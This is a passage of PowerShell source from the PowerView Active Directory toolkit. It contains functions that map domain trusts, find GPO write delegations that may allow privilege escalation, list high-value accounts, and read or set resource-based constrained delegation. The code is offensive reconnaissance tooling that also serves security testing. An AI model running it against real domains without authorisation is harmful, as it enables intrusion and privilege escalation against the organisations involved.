($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }\n    }\n\n    PROCESS {\n        # standard group names to ignore\n        $ExcludeGroups = @('Users', 'Domain Users', 'Guests')\n\n        Get-DomainGroup @SearcherArguments | Where-Object { $ExcludeGroups -notcontains $_.samaccountname } | ForEach-Object {\n            $GroupName = $_.samAccountName\n            $GroupDistinguishedName = $_.distinguishedname\n            $GroupDomain = $GroupDistinguishedName.SubString($GroupDistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n\n            $_.member | ForEach-Object {\n                # filter for foreign SIDs in the cn field for users in another domain,\n                #   or if the DN doesn't end with the proper DN for the queried domain\n                $MemberDomain = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                if (($_ -match 'CN=S-1-5-21.*-.*') -or ($GroupDomain -ne $MemberDomain)) {\n                    $MemberDistinguishedName = $_\n                    $MemberName = $_.Split(',')[0].split('=')[1]\n\n                    $ForeignGroupMember = New-Object PSObject\n                    $ForeignGroupMember | Add-Member Noteproperty 'GroupDomain' $GroupDomain\n                    $ForeignGroupMember | Add-Member Noteproperty 'GroupName' $GroupName\n                    $ForeignGroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupDistinguishedName\n                    $ForeignGroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain\n                    $ForeignGroupMember | Add-Member Noteproperty 'MemberName' $MemberName\n                    $ForeignGroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDistinguishedName\n                    $ForeignGroupMember.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember')\n                    $ForeignGroupMember\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainTrustMapping {\n<#\n.SYNOPSIS\n\nThis function enumerates all trusts for the current domain and then enumerates\nall trusts for each domain it finds.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Domain, Get-DomainTrust, Get-ForestTrust  \n\n.DESCRIPTION\n\nThis function will enumerate domain trust relationships for the current domain using\na number of methods, and then enumerates all trusts for each found domain, recursively\nmapping all reachable trust relationships. By default, and LDAP search using the filter\n'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified\nLDAP is used as well. If the -NET flag is specified, the .NET method\nGetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain\nobject. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is\nused to enumerate instead. If any \n\n.PARAMETER API\n\nSwitch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the\nbuilt-in LDAP method.\n\n.PARAMETER NET\n\nSwitch. Use .NET queries to enumerate trusts instead of the default LDAP method.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv\n\nMap all reachable domain trusts using .NET methods and output everything to a .csv file.\n\n.EXAMPLE\n\nGet-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv\n\nMap all reachable domain trusts using Win32 API calls and output everything to a .csv file.\n\n.EXAMPLE\n\nGet-DomainTrustMapping -NET | Export-CSV -NoTypeInformation trusts.csv\n\nMap all reachable domain trusts using .NET methods and output everything to a .csv file.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainTrustMapping -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv\n\nMap all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries\nusing the specified alternate credentials, and output everything to a .csv file.\n\n.OUTPUTS\n\nPowerView.DomainTrust.LDAP\n\nCustom PSObject with translated domain LDAP trust result fields (default).\n\nPowerView.DomainTrust.NET\n\nA TrustRelationshipInformationCollection returned when using .NET methods.\n\nPowerView.DomainTrust.API\n\nCustom PSObject with translated domain API trust result fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.DomainTrust.NET')]\n    [OutputType('PowerView.DomainTrust.LDAP')]\n    [OutputType('PowerView.DomainTrust.API')]\n    [CmdletBinding(DefaultParameterSetName = 'LDAP')]\n    Param(\n        [Parameter(ParameterSetName = 'API')]\n        [Switch]\n        $API,\n\n        [Parameter(ParameterSetName = 'NET')]\n        [Switch]\n        $NET,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [Parameter(ParameterSetName = 'API')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [Switch]\n        $Tombstone,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    # keep track of domains seen so we don't hit infinite recursion\n    $SeenDomains = @{}\n\n    # our domain status tracker\n    $Domains = New-Object System.Collections.Stack\n\n    $DomainTrustArguments = @{}\n    if ($PSBoundParameters['API']) { $DomainTrustArguments['API'] = $API }\n    if ($PSBoundParameters['NET']) { $DomainTrustArguments['NET'] = $NET }\n    if ($PSBoundParameters['LDAPFilter']) { $DomainTrustArguments['LDAPFilter'] = $LDAPFilter }\n    if ($PSBoundParameters['Properties']) { $DomainTrustArguments['Properties'] = $Properties }\n    if ($PSBoundParameters['SearchBase']) { $DomainTrustArguments['SearchBase'] = $SearchBase }\n    if ($PSBoundParameters['Server']) { $DomainTrustArguments['Server'] = $Server }\n    if ($PSBoundParameters['SearchScope']) { $DomainTrustArguments['SearchScope'] = $SearchScope }\n    if ($PSBoundParameters['ResultPageSize']) { $DomainTrustArguments['ResultPageSize'] = $ResultPageSize }\n    if ($PSBoundParameters['ServerTimeLimit']) { $DomainTrustArguments['ServerTimeLimit'] = $ServerTimeLimit }\n    if ($PSBoundParameters['Tombstone']) { $DomainTrustArguments['Tombstone'] = $Tombstone }\n    if ($PSBoundParameters['Credential']) { $DomainTrustArguments['Credential'] = $Credential }\n\n    # get the current domain and push it onto the stack\n    if ($PSBoundParameters['Credential']) {\n        $CurrentDomain = (Get-Domain -Credential $Credential).Name\n    }\n    else {\n        $CurrentDomain = (Get-Domain).Name\n    }\n    $Domains.Push($CurrentDomain)\n\n    while($Domains.Count -ne 0) {\n\n        $Domain = $Domains.Pop()\n\n        # if we haven't seen this domain before\n        if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) {\n\n            Write-Verbose \"[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'\"\n\n            # mark it as seen in our list\n            $Null = $SeenDomains.Add($Domain, '')\n\n            try {\n                # get all the trusts for this domain\n                $DomainTrustArguments['Domain'] = $Domain\n                $Trusts = Get-DomainTrust @DomainTrustArguments\n\n                if ($Trusts -isnot [System.Array]) {\n                    $Trusts = @($Trusts)\n                }\n\n                # get any forest trusts, if they exist\n                if ($PsCmdlet.ParameterSetName -eq 'NET') {\n                    $ForestTrustArguments = @{}\n                    if ($PSBoundParameters['Forest']) { $ForestTrustArguments['Forest'] = $Forest }\n                    if ($PSBoundParameters['Credential']) { $ForestTrustArguments['Credential'] = $Credential }\n                    $Trusts += Get-ForestTrust @ForestTrustArguments\n                }\n\n                if ($Trusts) {\n                    if ($Trusts -isnot [System.Array]) {\n                        $Trusts = @($Trusts)\n                    }\n\n                    # enumerate each trust found\n                    ForEach ($Trust in $Trusts) {\n                        if ($Trust.SourceName -and $Trust.TargetName) {\n                            # make sure we process the target\n                            $Null = $Domains.Push($Trust.TargetName)\n                            $Trust\n                        }\n                    }\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-DomainTrustMapping] Error: $_\"\n            }\n        }\n    }\n}\n\n\nfunction Get-GPODelegation {\n<#\n.SYNOPSIS\n\nFinds users with write permissions on GPO objects which may allow privilege escalation within the domain.\n\nAuthor: Itamar Mizrahi (@MrAnde7son)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER GPOName\n\nThe GPO display name to query for, wildcards accepted.\n\n.PARAMETER PageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.EXAMPLE\n\nGet-GPODelegation\n\nReturns all GPO delegations in current forest.\n\n.EXAMPLE\n\nGet-GPODelegation -GPOName\n\nReturns all GPO delegations on a given GPO.\n#>\n\n    [CmdletBinding()]\n    Param (\n        [String]\n        $GPOName = '*',\n\n        [ValidateRange(1,10000)] \n        [Int]\n        $PageSize = 200\n    )\n\n    $Exclusions = @('SYSTEM','Domain Admins','Enterprise Admins')\n\n    $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()\n    $DomainList = @($Forest.Domains)\n    $Domains = $DomainList | foreach { $_.GetDirectoryEntry() }\n    foreach ($Domain in $Domains) {\n        $Filter = \"(&(objectCategory=groupPolicyContainer)(displayname=$GPOName))\"\n        $Searcher = New-Object System.DirectoryServices.DirectorySearcher\n        $Searcher.SearchRoot = $Domain\n        $Searcher.Filter = $Filter\n        $Searcher.PageSize = $PageSize\n        $Searcher.SearchScope = \"Subtree\"\n        $listGPO = $Searcher.FindAll()\n        foreach ($gpo in $listGPO){\n            $ACL = ([ADSI]$gpo.path).ObjectSecurity.Access | ? {$_.ActiveDirectoryRights -match \"Write\" -and $_.AccessControlType -eq \"Allow\" -and  $Exclusions -notcontains $_.IdentityReference.toString().split(\"\\\")[1] -and $_.IdentityReference -ne \"CREATOR OWNER\"}\n        if ($ACL -ne $null){\n            $GpoACL = New-Object psobject\n            $GpoACL | Add-Member Noteproperty 'ADSPath' $gpo.Properties.adspath\n            $GpoACL | Add-Member Noteproperty 'GPODisplayName' $gpo.Properties.displayname\n            $GpoACL | Add-Member Noteproperty 'IdentityReference' $ACL.IdentityReference\n            $GpoACL | Add-Member Noteproperty 'ActiveDirectoryRights' $ACL.ActiveDirectoryRights\n            $GpoACL\n        }\n        }\n    }\n}\n\nfunction Find-HighValueAccounts {\n<#\n.SYNOPSIS\n\nFinds users that are currently high value accounts as AdminCount doesn't necessarily mean the privileges are current.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER SPN\n\nSwitch. Only return user objects with non-null service principal names.\n\n.PARAMETER Enabled\n\nSwitch. Return accounts that are currently enabled.\n\n.PARAMETER Disabled\n\nSwitch. Return accounts that are currently disabled.\n\n.PARAMETER AllowDelegation\n\nSwitch. Return accounts that are not marked as 'sensitive and not allowed for delegation'\n\n.PARAMETER DisallowDelegation\n\nSwitch. Return accounts that are marked as 'sensitive and not allowed for delegation'\n\n.PARAMETER PassNotExpire\n\nSwitch. Return accounts whose passwords do not expire.\n\n.PARAMETER Users\n\nSwitch. Return user accounts.\n\n.PARAMETER Computers\n\nSwitch. Return computer accounts.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.EXAMPLE\n\nFind-HighValueAccounts -Enabled\n\nReturns all enabled high value accounts.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ADObject')]\n    [OutputType('PowerView.ADObject.Raw')]\n    [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]\n    Param (\n        [Switch]\n        $SPN,\n\n        [Switch]\n        $Enabled,\n\n        [Switch]\n        $Disabled,\n\n        [Parameter(ParameterSetName = 'AllowDelegation')]\n        [Switch]\n        $AllowDelegation,\n\n        [Parameter(ParameterSetName = 'DisallowDelegation')]\n        [Switch]\n        $DisallowDelegation,\n\n        [Switch]\n        $PassNotExpire,\n\n        [Switch]\n        $Users,\n\n        [Switch]\n        $Computers,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $ObjectSearcher = Get-DomainSearcher @SearcherArguments\n\n        # array of high privileged groups from https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/\n        $AdminGroups = @(\n            'Account Operators',\n            'Administrators',\n            'Backup Operators',\n            'Cert Publishers',\n            'Domain Admins',\n            'Enterprise Admins',\n            'Enterprise Key Admins',\n            'Key Admins',\n            'Print Operators',\n            'Replicator',\n            'Schema Admins',\n            'Server Operators'\n        )\n\n        # variables\n        $IdentityFilter = ''\n        $Check = @()\n    }\n\n    PROCESS {\n\n        foreach ($AdminGroup in $AdminGroups) {\n            Get-DomainGroupMember $AdminGroup -Recurse @SearcherArguments | ?{$_.MemberObjectClass -ne 'group'} | ForEach-Object {\n                if (((!($Users)) -And (!($Computers))) -Or ((($Users) -And ($_.MemberObjectClass -eq 'user')) -Or (($Computers) -And ($_.MemberObjectClass -eq 'computer')))) {\n                    $MemberName = $_.MemberName\n                    if (($MemberName) -and (($Check.Count -eq 0 ) -Or (!($Check.Contains($MemberName))))) {\n                        $IdentityFilter += \"(samaccountname=$MemberName)\"\n                        $Check += $MemberName\n                    }\n                }\n            }\n        }\n\n        $Filter = \"(|$IdentityFilter)\"\n\n        # Additional filters\n        if ($PSBoundParameters['SPN']) {\n            Write-Verbose '[Find-HighValueAccounts] Searching for non-null service principal names'\n            $Filter += '(servicePrincipalName=*)'\n        }\n        if ($PSBoundParameters['Enabled']) {\n            Write-Verbose '[Find-HighValueAccounts] Searching for users who are enabled'\n            # negation of \"Accounts that are disabled\"\n            $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=2))'\n        }\n        if ($PSBoundParameters['Disabled']) {\n            Write-Verbose '[Find-HighValueAccounts] Searching for users who are disabled'\n            # inclusion of \"Accounts that are disabled\"\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=2)'\n        }\n        if ($PSBoundParameters['AllowDelegation']) {\n            Write-Verbose '[Find-HighValueAccounts] Searching for users who can be delegated'\n            # negation of \"Accounts that are sensitive and not trusted for delegation\"\n            $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048576))'\n        }\n        if ($PSBoundParameters['DisallowDelegation']) {\n            Write-Verbose '[Find-HighValueAccounts] Searching for users who are sensitive and not trusted for delegation'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048576)'\n        }\n        if ($PSBoundParameters['PassNotExpire']) {\n            Write-Verbose '[Find-HighValueAccounts] Searching for users whose passwords never expire'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=65536)'\n        }\n\n        $ObjectSearcher.filter = \"(&$Filter)\"\n        Write-Verbose \"[Find-HighValueAccounts] Find-HighValueAccounts filter string: $($ObjectSearcher.filter)\"\n        $Results = $ObjectSearcher.FindAll()\n        $Results | Where-Object {$_} | ForEach-Object {\n            if ($PSBoundParameters['Raw']) {\n                # return raw result objects\n                $Object = $_\n                $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')\n            }\n            else {\n                $Object = Convert-LDAPProperty -Properties $_.Properties\n                $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')\n            }\n            $Object\n        }\n        if ($Results) {\n            try { $Results.dispose() }\n            catch {\n                Write-Verbose \"[Find-HighValueAccounts] Error disposing of the Results object: $_\"\n            }\n        }\n        $ObjectSearcher.dispose()\n    }\n}\n\nfunction Get-DomainRBCD {\n<#\n.SYNOPSIS\n\nFinds accounts that are configured for resource-based constrained delegation and returns configuration.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER Identity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local). Wildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.EXAMPLE\n\nGet-DomainRBCD\n\nReturns the RBCD configuration for accounts in current domain.\n#>\n    [OutputType([PSObject])]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('SamAccountName', 'Name', 'DNSHostName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $RBCDSearcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        #bind dynamic parameter to a friendly variable\n        if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {\n            New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters\n        }\n        if ($RBCDSearcher) {\n            $IdentityFilter = ''\n            $Filter = ''\n            $Identity | Get-IdentityFilterString | ForEach-Object {\n                $IdentityFilter += $_\n            }\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter += \"(|$IdentityFilter)\"\n            }\n\n            $Filter += '(msds-allowedtoactonbehalfofotheridentity=*)'\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Get-DomainRBCD] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n            if ($Filter -and $Filter -ne '') {\n                $RBCDSearcher.filter = \"(&$Filter)\"\n            }\n            Write-Verbose \"[Get-DomainRBCD] Get-DomainRBCD filter string: $($RBCDSearcher.filter)\"\n\n            if ($PSBoundParameters['FindOne']) { $Results = $RBCDSearcher.FindOne() }\n            else { $Results = $RBCDSearcher.FindAll() }\n            $Results | Where-Object {$_} | ForEach-Object {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $Object = $_\n                    $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')\n                }\n                else {\n                    $Object = Convert-LDAPProperty -Properties $_.Properties\n                    $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')\n                }\n\n                $r = $Object | select -expand msds-allowedtoactonbehalfofotheridentity\n                $d = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $r, 0\n                $d.DiscretionaryAcl | ForEach-Object {\n                    $RBCDObject = New-Object PSObject\n                    $RBCDObject | Add-Member \"SourceName\" $Object.samaccountname\n                    $RBCDObject | Add-Member \"SourceType\" $Object.samaccounttype\n                    $RBCDObject | Add-Member \"SourceSID\" $Object.objectsid\n                    $RBCDObject | Add-Member \"SourceAccountControl\" $Object.useraccountcontrol\n                    $RBCDObject | Add-Member \"SourceDistinguishedName\" $Object.distinguishedname\n                    $RBCDObject | Add-Member \"ServicePrincipalName\" $Object.serviceprincipalname\n\n                    $Delegated = Get-DomainObject $_.SecurityIdentifier\n                    $RBCDObject | Add-Member \"DelegatedName\" $Delegated.samaccountname\n                    $RBCDObject | Add-Member \"DelegatedType\" $Delegated.samaccounttype\n                    $RBCDObject | Add-Member \"DelegatedSID\" $_.SecurityIdentifier\n                    $RBCDObject | Add-Member \"DelegatedAccountControl\" $Delegated.useraccountcontrol\n                    $RBCDObject | Add-Member \"DelegatedDistinguishedName\" $Delegated.distinguishedname\n\n                    $RBCDObject\n                }\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainRBCD] Error disposing of the Results object: $_\"\n                }\n            }\n            $RBCDSearcher.dispose()\n        }\n    }\n}\n\nfunction Set-DomainRBCD {\n<#\n.SYNOPSIS\n\nConfigure resource-based constrained delegation for accounts.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER Identity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local). Wildcards accepted.\n\n.PARAMETER DelegateFrom\n\nThe accounts that are going to be allowed to delegate to this account(s) specified by Identity.\nThis can be a pipe '|' separated list.\n\n.PARAMETER Clear\n\nRemove the contents of the msds-allowedtoactonbehalfofotheridentity attribute.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.EXAMPLE\n\nSet-DomainRBCD Computer1 -DelegateFrom Computer2|Computer3\n\nConfigured RBCD on Computer1 to allow Computer2 and Computer3 delegation rights.\n#>\n    [OutputType([bool])]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('SamAccountName', 'Name', 'DNSHostName')]\n        [String[]]\n        $Identity,\n\n        [String]\n        $DelegateFrom,\n\n        [Switch]\n        $Clear,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 